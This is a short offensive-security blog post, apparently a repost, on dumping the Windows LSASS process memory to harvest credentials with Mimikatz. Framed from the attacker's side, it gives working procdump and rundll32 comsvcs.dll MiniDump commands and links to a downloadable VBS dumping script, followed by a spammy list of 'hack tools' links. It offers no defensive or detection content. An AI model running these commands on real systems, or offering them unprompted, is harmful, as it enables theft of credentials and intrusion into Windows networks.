LSASS Dumping Methods ( For Mimikatz )

In every attack we need to get the windows credentials, this super important task. We need to target "LSASS.EXE" process and dump the process memory so that we can use it for extracting credentials using Mimikatz.


Here are some of the important methods,

Using ProcDump :

1. Favorite method of dumping is using "procdump.exe". This tool is from Microsoft Pstools
2. Download ProcDump.exe and upload in on remote system
3. Command : "procdump -ma lsass.exe lsass.dmp"


Using VB Script :

Download script from here :
https://drive.google.com/open?id=1jwy40ykrdEHWB1sddZ-Q5USDX9OOPOPp

rundll32 Command :

Essentially previous method VBS script is using following command for dumping Lsass.exe process

rundll32 C:\windows\system32\comsvcs.dll, MiniDump 992 C:\Users\Public\lsass.bin full

So in case you do not have VB Script with you still you can fire-up the command and dump LSASS process.

This article is the property of Tenochtitlan Offensive Security. Verlo Completo --> https://tenochtitlan-sec.blogspot.com

More articles

1. Hack Tools
2. Hacking Tools For Games
3. Pentest Tools Url Fuzzer
4. Pentest Tools Apk
5. Tools 4 Hack
6. Hack Tools Github
7. Pentest Tools Port Scanner
8. Hacker Tools Hardware
9. Hack Tool Apk No Root
10. Install Pentest Tools Ubuntu
11. Pentest Tools Url Fuzzer
12. Hacking Tools For Windows
13. Hacking Tools For Windows 7
14. Hack Rom Tools
15. New Hacker Tools
16. Hackrf Tools
17. Growth Hacker Tools
18. Hack Tools For Games
19. Pentest Tools Port Scanner
20. Hack Tools Online
21. Hacking Tools Usb
22. Hacker Tools Windows
23. Hack Tools
24. Hacking Tools For Windows
25. Hacking Tools Name
26. Nsa Hack Tools